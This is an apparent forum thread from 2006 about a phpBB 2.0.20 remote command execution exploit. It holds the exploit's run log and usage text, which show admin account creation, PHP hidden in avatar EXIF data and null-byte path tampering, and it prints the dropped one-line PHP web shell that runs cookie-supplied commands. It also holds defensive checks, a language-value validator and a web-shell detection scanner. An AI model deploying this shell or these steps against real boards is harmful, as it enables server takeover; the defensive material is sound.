Posted: 14.05.2006 14:02
I can't get it to work either, but it's supposed to work from what I've heard.
Hopefully the phpBB Group will bring out a fix for it quickly. :(
phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/
- User suntzu is in and has admin rights...

```text
X-Powered-By: PHP/4.4.1-pl1
Content-type: text/html
PhpBB <= v2.0.20 "Admin/Restore Database/default_lang remote commands execution
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
-> you need an admin sid, works regardless of magic_quotes_gpc settings
tested and working against a fresh PhpBB installation
step 0 -> check if suntzu.php is already installed...
Step 0b -> check if exploit has already succeeded but suntzu.php deleted, try to login as suntzu...
step 0c -> query database to create a "suntzu" user with password "suntzu"...
Done...
Step 1 -> Login as suntzu...
Cookie ->phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A6%3A%22999999%22%3B%7D; phpbb2mysql_sid=25d351a87bf1e15f451a9b8025c1d787;
sid ->25d351a87bf1e15f451a9b8025c1d787
step 2 -> enable avatar uploads, if not enabled yet...
Done...
step 3 -> upload an avatar with php code as EXIF metadata content...
step 4 -> retrieve new filename for avatar from profile page...
avatar filename -> 12134446738610cabd.jpg
step 5 -> replace default_lang value in phpbb_config table with our path to shell, breaking path with a null char...
Done...
step 6 -> execute code inside jpeg file
step 7 -> Launch commands...
Exploit succeeded...
Datenträger in Laufwerk D: ist Data
Volumeseriennummer: 9411-E960
Verzeichnis von D:\Inetpub\Lokal\phpbb2\Beta
14.05.2006 16:02 <DIR> .
14.05.2006 16:02 <DIR> ..
14.05.2006 15:57 <DIR> admin
14.05.2006 15:57 <DIR> cache
05.04.2006 18:53 6.660 common.php
14.05.2006 15:58 249 config.php
14.05.2006 15:57 <DIR> db
14.05.2006 15:57 <DIR> docs
05.04.2006 18:53 810 extension.inc
05.04.2006 18:53 3.643 faq.php
05.04.2006 18:53 45.807 groupcp.php
14.05.2006 15:57 <DIR> images
14.05.2006 15:57 <DIR> includes
05.04.2006 18:53 14.706 index.php
14.05.2006 15:57 <DIR> language
05.04.2006 18:53 9.492 login.php
05.04.2006 18:53 12.208 memberlist.php
05.04.2006 18:53 39.011 modcp.php
05.04.2006 18:53 34.911 posting.php
05.04.2006 18:53 73.811 privmsg.php
05.04.2006 18:53 3.428 profile.php
05.04.2006 18:53 43.661 search.php
14.05.2006 16:02 163 suntzu.php
14.05.2006 15:57 <DIR> templates
05.04.2006 18:53 23.154 viewforum.php
05.04.2006 18:53 7.233 viewonline.php
05.04.2006 18:53 45.235 viewtopic.php
14.05.2006 15:57 <DIR> _contrib
14.05.2006 15:57 <DIR> _install
17 Datei(en) 364.182 Bytes
12 Verzeichnis(se), 38.003.675.136 Bytes frei
step 8 -> restore phpbb_config with the old value to keep the board accessible
Done...
# milw0rm.com [2006-05-13]
```
```php
<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo 56789;passthru($_COOKIE[cmd]);echo 56789;?>
```
```php
if( file_exists( $phpbb_root_path . 'suntzu.php') or file_exists( $phpbb_root_path . 'admin/suntzu.php' ) )
{
	die('hacking attempt');
}
```
```php
if (file_exists($phpbb_root_path . 'suntzu.php'))
{
	die('hacking attempt');
}
```
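The two checks above only catch the one filename this particular exploit drops. The following is an added example, not code from this thread and not phpBB's own: it validates the `default_lang` configuration value as a plain language name before it is used to build an include path (the value step 5 in the log tampers with, using a null byte to truncate the path), and it scans the board tree for files that hand request data straight to a command-execution function, which also catches PHP stored inside a JPEG's EXIF data as in step 3. The function names `validate_default_lang` and `find_suspicious_files` are hypothetical; it assumes the phpBB 2 layout with `language/lang_<name>/` under the board root and PHP 5.3 or later for the SPL iterators.

```php
<?php
// Added example, not part of the thread or of phpBB. Function names are hypothetical.
// Assumes the phpBB 2 layout: <root>/language/lang_<name>/ holds each installed language.

// Accept default_lang only if it is a plain language token AND names an installed
// language directory that really lives below the board root.
function validate_default_lang($lang, $root)
{
    // Reject null bytes, slashes, dots and anything else that could turn the
    // value into a path; a language name is a short lowercase token.
    if (!is_string($lang) || !preg_match('/^[a-z0-9_]{1,30}$/', $lang)) {
        return false;
    }
    $root_real = realpath($root);
    $dir_real  = realpath($root . '/language/lang_' . $lang);
    if ($root_real === false || $dir_real === false || !is_dir($dir_real)) {
        return false;
    }
    // Belt and braces: the resolved directory must sit below the board root.
    return strpos($dir_real, $root_real . DIRECTORY_SEPARATOR) === 0;
}

// Walk the board tree and return every file whose content passes request data
// (cookie, GET, POST) or a base64 blob straight into a command/eval function.
// Images are scanned too, because the avatar step stores the PHP in EXIF data.
function find_suspicious_files($root, $max_bytes = 2097152)
{
    $pattern = '/\b(passthru|system|shell_exec|exec|popen|eval)\s*\(\s*'
             . '(\$_(COOKIE|GET|POST|REQUEST)\b|base64_decode\s*\()/i';
    $hits = array();
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $file) {
        if (!$file->isFile() || $file->getSize() > $max_bytes) {
            continue;   // skip huge files; a dropped shell or EXIF payload is tiny
        }
        $content = file_get_contents($file->getPathname());
        if ($content !== false && preg_match($pattern, $content)) {
            $hits[] = $file->getPathname();
        }
    }
    return $hits;
}

// Constructed demonstration values; the board root below is an assumed path.
$board_root = '/var/www/phpbb2';
var_dump(validate_default_lang('english', $board_root));   // true only if lang_english is installed
// A constructed value of the shape step 5 describes: a path with a null byte in it.
var_dump(validate_default_lang("../../images/avatars/x.jpg\0", $board_root));   // bool(false)
foreach (find_suspicious_files($board_root) as $path) {
    echo "suspicious: $path\n";
}
```

The whitelist check is the part that closes the hole the log exploits: a value that is not a bare language name never reaches an include statement, whatever file was uploaded. The scanner is a detection aid for boards that may already have been hit; it should be run from the command line rather than from a web-reachable script, and any hit should be inspected by hand rather than deleted blindly.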
```php
<?php
if( !defined('IN_PHPBB') )
{
	die('Hacking attempt');
}

// Look up the session row for the sid supplied in the URL
$sql = "SELECT s.session_id, s.session_ip FROM ".SESSIONS_TABLE." s WHERE s.session_id = '". str_replace("\'", "''", $HTTP_GET_VARS['sid']) ."' LIMIT 1";
if( !( $result = $db->sql_query($sql) ))
{
	message_die(CRITICAL_ERROR, 'Hacking attempt', '', __LINE__, __FILE__, $sql);
}
$sessionrow = $db->sql_fetchrow($result);

// The sid must match a stored session exactly
if( $HTTP_GET_VARS['sid'] != $sessionrow['session_id'] )
{
	die('Hacking attempt');
}

// ...and the request must come from the IP the session was opened from
if( $HTTP_SERVER_VARS['REMOTE_ADDR'] != decode_ip($sessionrow['session_ip']) )
{
	die('Hacking attempt');
}
unset($sessionrow);
?>
```
```text
PhpBB <= v2.0.20 "Admin/Restore Database/default_lang remote commands execution
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
-> you need an admin sid, works regardless of magic_quotes_gpc settings
tested and working against a fresh PhpBB installation
Usage: php host path sid cmd OPTIONS
host: target server (ip/hostname)
path: path to PhpBB
sid: session id
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Examples: php localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 cat config.php
php localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 ls -la -p81
php localhost / 8db5cef976c7e0f51c25c92152b56881 ls -la -P1.1.1.1:80
step 0 -> check if suntzu.php is already installed...
Step 0b -> check if exploit has already succeeded but suntzu.php deleted, try to login as suntzu...
Cookie ->
sid ->
Step 1 -> Login as suntzu...
Cookie ->
sid ->
Unable to login...
```